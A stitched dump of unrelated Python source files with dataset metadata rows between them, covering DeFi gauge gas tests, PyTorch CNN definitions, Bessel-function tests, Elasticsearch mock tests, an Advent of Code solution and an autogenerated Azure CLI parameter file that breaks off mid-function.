def test_exchange_underlying_tusd_to_usdc(_yvolgauge, ypool, TUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(TUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(TUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_tusd(_yvolgauge, ypool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_tusd_to_usdt(_yvolgauge, ypool, TUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(TUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(TUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
| 60.832479 | 130 | 0.644027 | 3,990 | 35,587 | 5.488471 | 0.017293 | 0.10521 | 0.083291 | 0.067948 | 0.991095 | 0.990137 | 0.990137 | 0.990137 | 0.990137 | 0.990137 | 0 | 0.022091 | 0.225335 | 35,587 | 584 | 131 | 60.936644 | 0.772272 | 0.000478 | 0 | 0.876122 | 0 | 0 | 0.11808 | 0.036436 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043088 | false | 0 | 0.001795 | 0 | 0.044883 | 0.301616 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d872b7bd8b285983df7e651e0ec66b653421da4 | 4,226 | py | Python | model_defs.py | dzy18/Adaptive-Bound-Learning | ad9969a22a53f73668a04d945bd09e277a32aa20 | [
"BSD-2-Clause"
] | 1 | 2021-06-29T10:49:48.000Z | 2021-06-29T10:49:48.000Z | model_defs.py | dzy18/Adaptive-Bound-Learning | ad9969a22a53f73668a04d945bd09e277a32aa20 | [
"BSD-2-Clause"
] | null | null | null | model_defs.py | dzy18/Adaptive-Bound-Learning | ad9969a22a53f73668a04d945bd09e277a32aa20 | [
"BSD-2-Clause"
] | null | null | null | import torch.nn as nn
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
def model_cnn_2layer(in_ch, in_dim, width, linear_size = 128):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 4, stride=2, padding = 1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 4, stride=2, padding = 1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4), linear_size),
nn.ReLU(),
nn.Linear(linear_size, 10)
)
return model
def prelu_model_cnn_2layer(in_ch, in_dim, width, linear_size = 128):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 4, stride=2, padding = 1),
nn.PReLU(),
nn.Conv2d(4*width, 8*width, 4, stride=2, padding = 1),
nn.PReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4), linear_size),
nn.PReLU(),
nn.Linear(linear_size, 10)
)
return model
def leaky_model_cnn_2layer(in_ch, in_dim, width, linear_size = 128):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 4, stride=2, padding = 1),
nn.LeakyReLU(),
nn.Conv2d(4*width, 8*width, 4, stride=2, padding = 1),
nn.LeakyReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4), linear_size),
nn.LeakyReLU(),
nn.Linear(linear_size, 10)
)
return model
def model_cnn_3layer_fixed(in_ch, in_dim, kernel_size, width, linear_size = None):
if linear_size is None:
linear_size = width * 64
if kernel_size == 5:
h = (in_dim - 4) // 4
elif kernel_size == 3:
h = in_dim // 4
else:
raise ValueError("Unsupported kernel size")
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, kernel_size=kernel_size, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, kernel_size=kernel_size, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, kernel_size=4, stride=4, padding=0),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*h*h, linear_size),
nn.ReLU(),
nn.Linear(linear_size, 10)
)
return model
def prelu_model_cnn_3layer_fixed(in_ch, in_dim, kernel_size, width, linear_size = None):
if linear_size is None:
linear_size = width * 64
if kernel_size == 5:
h = (in_dim - 4) // 4
elif kernel_size == 3:
h = in_dim // 4
else:
raise ValueError("Unsupported kernel size")
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, kernel_size=kernel_size, stride=1, padding=1),
nn.PReLU(),
nn.Conv2d(4*width, 8*width, kernel_size=kernel_size, stride=1, padding=1),
nn.PReLU(),
nn.Conv2d(8*width, 8*width, kernel_size=4, stride=4, padding=0),
nn.PReLU(),
Flatten(),
nn.Linear(8*width*h*h, linear_size),
nn.PReLU(),
nn.Linear(linear_size, 10)
)
return model
def model_cnn_4layer(in_ch, in_dim, width, linear_size):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim//4)*(in_dim//4), linear_size),
nn.ReLU(),
nn.Linear(linear_size, linear_size),
nn.ReLU(),
nn.Linear(linear_size, 10)
)
return model
def prelu_model_cnn_4layer(in_ch, in_dim, width, linear_size):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.PReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.PReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.PReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.PReLU(),
Flatten(),
nn.Linear(8*width*(in_dim//4)*(in_dim//4), linear_size),
nn.PReLU(),
nn.Linear(linear_size, linear_size),
nn.PReLU(),
nn.Linear(linear_size, 10)
)
return model
| 32.259542 | 88 | 0.576668 | 635 | 4,226 | 3.680315 | 0.083465 | 0.124091 | 0.077022 | 0.055627 | 0.962773 | 0.962773 | 0.962773 | 0.958922 | 0.95122 | 0.95122 | 0 | 0.055718 | 0.269522 | 4,226 | 130 | 89 | 32.507692 | 0.701328 | 0 | 0 | 0.85 | 0 | 0 | 0.010888 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.008333 | 0.008333 | 0.15 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6db7917b2cbaa10d8d0a619d88707582fa4788a4 | 887 | py | Python | tests/test_provider_AdrienneCohea_vaultutility.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_AdrienneCohea_vaultutility.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_AdrienneCohea_vaultutility.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_AdrienneCohea_vaultutility.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:30:15 UTC)
def test_provider_import():
import terrascript.provider.AdrienneCohea.vaultutility
def test_resource_import():
from terrascript.resource.AdrienneCohea.vaultutility import (
vaultutility_initialization,
)
from terrascript.resource.AdrienneCohea.vaultutility import vaultutility_unseal
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.AdrienneCohea.vaultutility
#
# t = terrascript.provider.AdrienneCohea.vaultutility.vaultutility()
# s = str(t)
#
# assert 'https://github.com/AdrienneCohea/terraform-provider-vaultutility' in s
# assert '0.0.3' in s
| 30.586207 | 85 | 0.766629 | 103 | 887 | 6.485437 | 0.543689 | 0.224551 | 0.197605 | 0.197605 | 0.347305 | 0.197605 | 0.197605 | 0 | 0 | 0 | 0 | 0.019868 | 0.148816 | 887 | 28 | 86 | 31.678571 | 0.864901 | 0.613303 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0 | 1 | 0.285714 | true | 0 | 0.714286 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
6dcb7322397260289e1af232bbdd5d9e438cd20c | 179 | py | Python | backend-flask-sqlalchemy/exemplo_tech_store/TechApp/views.py | santiagosilas/dweb20192-vuejs | d6b322c075682247ca2e1eb70c9c64d27d741fa2 | [
"MIT"
] | 1 | 2020-11-12T15:27:20.000Z | 2020-11-12T15:27:20.000Z | cap_07_flask_sqlalchemy/exemplo_tech_store/TechApp/views.py | santiagosilas/BasicoFlaskDevWeb | de7b952427e453b365c84a7f26882174d5cb13ae | [
"MIT"
] | 36 | 2019-12-05T10:39:07.000Z | 2022-02-27T10:34:55.000Z | backend-flask-sqlalchemy/exemplo_tech_store/TechApp/views.py | santiagosilas/dweb20192-vuejs | d6b322c075682247ca2e1eb70c9c64d27d741fa2 | [
"MIT"
] | null | null | null | from TechApp import app
from flask import render_template, redirect, url_for, request
@app.route('/')
@app.route('/home')
def homepage():
return render_template('index.html')
| 19.888889 | 61 | 0.743017 | 25 | 179 | 5.2 | 0.72 | 0.215385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117318 | 179 | 8 | 62 | 22.375 | 0.822785 | 0 | 0 | 0 | 0 | 0 | 0.089888 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.333333 | 0.166667 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
6deac8e1e0cb385101dbec6080d4cf372fc5d278 | 7,163 | py | Python | tests/test_special.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_special.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_special.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | """
Tests for special functions
"""
import pytest
from spharpy import special
from spharpy import samplings
import numpy as np
import numpy.testing as npt
def genfromtxt_complex(filename, delimiter=','):
"""generate complex numpy array from csv file."""
data_str = np.genfromtxt(filename, delimiter=delimiter, dtype=str)
mapping = np.vectorize(lambda t: complex(t.replace('i', 'j')))
return mapping(data_str)
class TestBessel(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_bessel(n, z)
shape = (2, 10)
assert shape == res.shape
def test_val(self):
z = np.linspace(0, 10, 25)
n = [0, 1, 2]
res = special.spherical_bessel(n, z)
truth = np.genfromtxt('./tests/data/bessel.csv', delimiter=',')
npt.assert_allclose(res, truth)
class TestBesselPrime(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_bessel(n, z, derivative=True)
shape = (2, 10)
assert shape == res.shape
def test_val(self):
z = np.linspace(0.1, 10, 25)
n = [0, 1, 2]
res = special.spherical_bessel(n, z, derivative=True)
truth = np.genfromtxt('./tests/data/bessel_diff.csv', delimiter=',')
npt.assert_allclose(res, truth)
class TestHankel(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_hankel(n, z, kind=1)
shape = (2, 10)
assert shape == res.shape
def test_kind_exception(self):
with pytest.raises(ValueError):
special.spherical_hankel([0], [1], kind=3)
def test_val_second_kind(self):
z = np.linspace(0.1, 5, 25)
n = np.array([0, 1, 2])
res = special.spherical_hankel(n, z, kind=2)
truth = genfromtxt_complex('./tests/data/hankel_2.csv', delimiter=',')
npt.assert_allclose(res, truth)
def test_val_first_kind(self):
z = np.linspace(0.1, 5, 25)
n = np.array([0, 1, 2])
res = special.spherical_hankel(n, z, kind=1)
truth = genfromtxt_complex('./tests/data/hankel_1.csv', delimiter=',')
npt.assert_allclose(res, truth)
class TestHankelPrime(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_hankel(n, z, kind=1, derivative=True)
shape = (2, 10)
assert shape == res.shape
def test_kind_exception(self):
with pytest.raises(ValueError):
special.spherical_hankel([0], [1], kind=3, derivative=True)
def test_val_second_kind(self):
z = np.linspace(0.1, 5, 25)
n = [0, 1, 2]
res = special.spherical_hankel(n, z, kind=2, derivative=True)
truth = genfromtxt_complex('./tests/data/hankel_2_diff.csv', delimiter=',')
npt.assert_allclose(res, truth)
def test_val_first_kind(self):
z = np.linspace(0.1, 5, 25)
n = [0, 1, 2]
res = special.spherical_hankel(n, z, kind=1, derivative=True)
truth = genfromtxt_complex('./tests/data/hankel_1_diff.csv', delimiter=',')
npt.assert_allclose(res, truth)
def test_spherical_harmonic_derivative_theta():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_ele.csv',
dtype=np.complex,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_theta(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_derivative_phi():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_diff_azi.csv',
dtype=np.complex,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_phi(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_gradient_phi():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_azi.csv',
dtype=np.complex,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_gradient_phi(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_derivative_theta_real():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_real_ele.csv',
dtype=np.double,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_theta_real(
n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_derivative_phi_real():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_diff_real_azi.csv',
dtype=np.double,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_phi_real(
n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_gradient_phi_real():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_real_azi.csv',
dtype=np.double,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_gradient_phi_real(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
| 30.480851 | 83 | 0.59207 | 1,109 | 7,163 | 3.686204 | 0.08927 | 0.041096 | 0.029354 | 0.020548 | 0.905333 | 0.905333 | 0.880382 | 0.861301 | 0.80455 | 0.80455 | 0 | 0.044044 | 0.248778 | 7,163 | 234 | 84 | 30.611111 | 0.715666 | 0.009912 | 0 | 0.748538 | 0 | 0 | 0.049866 | 0.047747 | 0 | 0 | 0 | 0 | 0.093567 | 1 | 0.111111 | false | 0 | 0.02924 | 0 | 0.169591 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
099217c9e953853d15c67f719f31623ca19a7a40 | 1,414 | py | Python | tests/fake_elasticsearch/test_sort.py | g3rg0/elasticmock | eddf55e6b17a775d455e98ad3647e5ad65e22b4f | [
"MIT"
] | null | null | null | tests/fake_elasticsearch/test_sort.py | g3rg0/elasticmock | eddf55e6b17a775d455e98ad3647e5ad65e22b4f | [
"MIT"
] | 2 | 2021-03-24T15:07:48.000Z | 2021-04-07T09:51:39.000Z | tests/fake_elasticsearch/test_sort.py | g3rg0/elasticmock | eddf55e6b17a775d455e98ad3647e5ad65e22b4f | [
"MIT"
] | 4 | 2020-08-20T17:36:02.000Z | 2021-11-30T22:37:24.000Z | from tests import TestElasticmock, INDEX_NAME, DOC_TYPE
class TestSearch(TestElasticmock):
def test_sort_by_field_asc(self):
index_quantity = 10
result = []
for i in range(0, index_quantity):
body = {'data': 'test_{0}'.format(i), 'sort_param':'{0}'.format(i)}
result.append(body)
self.es.index(index=INDEX_NAME, doc_type=DOC_TYPE, body=body)
search = self.es.search(body={'query': {'match_all': {}},
'sort': [{ "sort_param" : {"order" : "asc"}}]
})
search_result = [hit.get('_source') for hit in search.get('hits').get('hits')]
self.assertListEqual(result, search_result)
def test_sort_by_field_desc(self):
index_quantity = 10
result = []
for i in range(0, index_quantity):
body = {'data': 'test_{0}'.format(i), 'sort_param':'{0}'.format(i)}
result.append(body)
self.es.index(index=INDEX_NAME, doc_type=DOC_TYPE, body=body)
search = self.es.search(body={'query': {'match_all': {}},
'sort': [{ "sort_param" : {"order" : "desc"}}]
})
search_result = [hit.get('_source') for hit in search.get('hits').get('hits')]
result.reverse()
self.assertListEqual(result, search_result)
| 41.588235 | 86 | 0.535361 | 163 | 1,414 | 4.435583 | 0.263804 | 0.048409 | 0.04426 | 0.06639 | 0.857538 | 0.705394 | 0.705394 | 0.705394 | 0.705394 | 0.705394 | 0 | 0.010256 | 0.310467 | 1,414 | 33 | 87 | 42.848485 | 0.731282 | 0 | 0 | 0.740741 | 0 | 0 | 0.108204 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.074074 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09bd9647817c19ec169e93e55b222c2a7ae98c90 | 1,519 | py | Python | 2020/day3.py | paaraujo/Advent-of-Code | 5e22f9212f65c4ffc6e1a9d86e6ed792e0ac16bf | [
"MIT"
] | null | null | null | 2020/day3.py | paaraujo/Advent-of-Code | 5e22f9212f65c4ffc6e1a9d86e6ed792e0ac16bf | [
"MIT"
] | null | null | null | 2020/day3.py | paaraujo/Advent-of-Code | 5e22f9212f65c4ffc6e1a9d86e6ed792e0ac16bf | [
"MIT"
] | null | null | null | import math
def part1():
with open('inputs/day3.txt') as f:
forest = [list(line.rstrip('\n')) for line in f]
rows = len(forest)
cols = len(forest[0])
row = 0
col = 1
right = 3
down = 1
trees = 0
while True:
if col + right > cols:
col = ((col + right) - cols)
else:
col += right
if row < rows - down:
row += down
else:
break
element = forest[row][col - 1]
if element == '#':
trees += 1
return trees
def part2():
with open('inputs/day3.txt') as f:
forest = [list(line.rstrip('\n')) for line in f]
rows = len(forest)
cols = len(forest[0])
row = 0
col = 1
trees = 0
slopes = [[1, 1], [3, 1], [5, 1], [7, 1], [1, 2]]
result = []
for right, down in slopes:
while True:
if col + right > cols:
col = ((col + right) - cols)
else:
col += right
if row < rows - down:
row += down
else:
break
element = forest[row][col - 1]
if element == '#':
trees += 1
result.append(trees)
col = 1
row = 0
trees = 0
return math.prod(result)
print(part1())
print(part2())
| 24.111111 | 57 | 0.382488 | 164 | 1,519 | 3.542683 | 0.27439 | 0.082616 | 0.082616 | 0.061962 | 0.702238 | 0.702238 | 0.702238 | 0.702238 | 0.702238 | 0.702238 | 0 | 0.043478 | 0.500329 | 1,519 | 62 | 58 | 24.5 | 0.722003 | 0 | 0 | 0.759259 | 0 | 0 | 0.0237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.018519 | 0 | 0.092593 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09ec253de5b73840268a6aa24aa6e2d59d211775 | 57,457 | py | Python | msgraph-cli-extensions/v1_0/personalcontacts_v1_0/azext_personalcontacts_v1_0/generated/_params.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/personalcontacts_v1_0/azext_personalcontacts_v1_0/generated/_params.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/personalcontacts_v1_0/azext_personalcontacts_v1_0/generated/_params.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from msgraph.cli.core.commands.validators import validate_file_or_dict
from azext_personalcontacts_v1_0.action import (
AddBusinessAddress,
AddEmailAddresses,
AddExtensions,
AddPersonalcontactsUserCreateContactMultiValueExtendedProperties,
AddPhoto,
AddPersonalcontactsUserCreateContactSingleValueExtendedProperties,
AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties,
AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties
)
def load_arguments(self, _):
with self.argument_context('personalcontacts user create-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'')
c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('business_home_page', type=str, help='The business home page of the contact.')
c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
c.argument('children', nargs='+', help='The names of the contact\'s children.')
c.argument('company_name', type=str, help='The name of the contact\'s company.')
c.argument('department', type=str, help='The contact\'s department.')
c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
'create or update operation. Note that later updates to other properties may cause an automatically '
'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
'value, always include it as displayName in an update operation.')
c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
